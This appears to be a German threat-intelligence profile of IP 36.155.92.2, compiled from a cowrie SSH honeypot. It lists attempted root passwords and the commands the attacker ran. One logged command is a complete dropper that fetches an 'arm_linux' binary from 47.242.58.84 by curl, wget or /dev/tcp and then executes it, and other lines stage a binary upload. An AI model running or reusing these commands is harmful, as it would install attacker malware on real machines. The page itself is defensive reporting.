Aktive BedrohungNIEDRIG

36.155.92.2

Herkunftsland🇨🇳 China
Erste Erkennung12.1.2026
Letzte Aktivitat12.1.2026
ISPChina Mobile communications corporation
🎯
16
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
2
Malware

Geolokalisierung

Land
🇨🇳 China
Stadt
Shanghai
ASN
AS56046
ISP
China Mobile communications corporation

Angriffsarten

cowrie

Angegriffene Ports

22

Zugehorige Malware

Versuchte Anmeldedaten

🔐root/RNSKd3slTb
1x
🔐root/Aa@123456
1x

Ausgefuhrte Befehle

$nohup $SHELL -c "curl http://47.242.58.84:60109/arm_linux -o /tmp/tuRElclRg7; if [ ! -f /tmp/tuRElclRg7 ]; then wget http://47.242.58.84:60109/arm_linux -O /tmp/tuRElclRg7; fi; if [ ! -f /tmp/tuRElclRg7 ]; then exec 6<>/dev/tcp/47.242.58.84/60109 && echo -n 'GET /arm_linux' >&6 && cat 0<&6 > /tmp/tuRElclRg7 ; chmod +x /tmp/tuRElclRg7 && /tmp/tuRElclRg7 mPBQyUMXLi4XQ8BP4eHu6lfIQwosPw1F1lnm9+rjT8lLDCUpCUPLUfDh9+JQyFwIKCcXRshb5uno41DYQwssMQxE1lDi7PfjWcJFAC8nGUbPT+jv9+FWzlwLLyYDRMhQ4+r56E/JRgkxLQlA12x
$(v\MYMELF1x
$4(JY[ 6w?plUV_1x
$4(JY [ 6w?plUV_1x
$head -c 2622172 > /tmp/gGWg9wYyNs1x
$echo 1 > /dev/null && cat /bin/echo1x

Risikobewertung

25
/100
NiedrigMittelHochKritisch